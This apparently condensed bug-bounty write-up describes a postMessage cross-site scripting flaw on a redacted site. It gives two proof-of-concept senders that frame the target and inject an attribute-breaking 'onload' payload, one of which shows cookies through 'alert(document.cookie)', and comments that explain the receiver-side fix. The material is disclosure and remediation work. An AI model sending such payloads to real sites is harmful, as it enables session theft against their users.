PostMessage XSS vulnerability on a private program

notification from postMessage tracker
postMessage script
creatFloatingPageElement function
getDataFromEvent function
<script>
/**
 * Proof-of-concept sender from the write-up: once the embedded frame has
 * loaded, it posts an "e:openFloatingPage" message to the element with id
 * "VulnerableSiteIframe".
 *
 * The `url` field is a URL followed by a double quote and `+onload=alert()`.
 * NOTE(review): the receiving handler is not shown on this page. Presumably it
 * concatenates `data.url` into an HTML attribute without escaping and without
 * checking `event.origin`, so the quote closes the attribute. Confirm against
 * the target's message listener.
 *
 * Receiver-side fix: compare `event.origin` with an allowlist, parse `url`
 * and accept only http(s) URLs, and assign it through a DOM property rather
 * than string-built markup. Restricting framing does not replace the origin
 * check.
 */
function SendMessage() {
  const targetFrame = document.getElementById('VulnerableSiteIframe');

  // Fields the "e:openFloatingPage" message carries; only `url` is hostile.
  const floatingPageData = {
    "id": "1234gghq",
    "name": "tayba",
    "url": "https://www.framable.com\"+onload=alert()"
  };
  const payload = {
    "message": "e:openFloatingPage",
    "data": floatingPageData
  };

  // A '*' targetOrigin delivers the message whatever origin the frame holds.
  targetFrame.contentWindow.postMessage(payload, '*');
};
<iframe id="VulnerableSiteIframe" height="400" width="1024" src="https://redacted.com/bootstrap.php" onload="SendMessage()"></iframe>
</script>
<script>
/**
 * Second proof-of-concept sender from the write-up. It posts the same
 * "e:openFloatingPage" message to the frame with id "VulnerableSiteIframe",
 * but the injected handler is `alert(document.cookie)`.
 *
 * `document.cookie` exposes only cookies that are not marked HttpOnly, so
 * this variant shows the impact when session cookies lack that flag.
 * NOTE(review): the receiving handler is not shown on this page. Presumably
 * `data.url` reaches an HTML attribute unescaped and `event.origin` is never
 * checked. Confirm against the target's message listener.
 *
 * Receiver-side fix: allowlist `event.origin`, validate `url` as an http(s)
 * URL, and set it through a DOM property instead of concatenated markup.
 */
function SendMessage() {
  const frameEl = document.getElementById('VulnerableSiteIframe');
  const frameWindow = frameEl.contentWindow;

  // The double quote in `url` is what would end the attribute on the receiver.
  const envelope = {
    "message": "e:openFloatingPage",
    "data": {
      "id": "1234gghq",
      "name": "tayba",
      "url": "https://www.anything.com\"+onload=alert(document.cookie)"
    }
  };

  // targetOrigin '*' places no restriction on the recipient's origin.
  frameWindow.postMessage(envelope, '*');
};
<iframe id="VulnerableSiteIframe" height="400" width="1024" src="https://redacted.com/download.php?p=jjjj" onload="SendMessage()"></iframe>
</script>
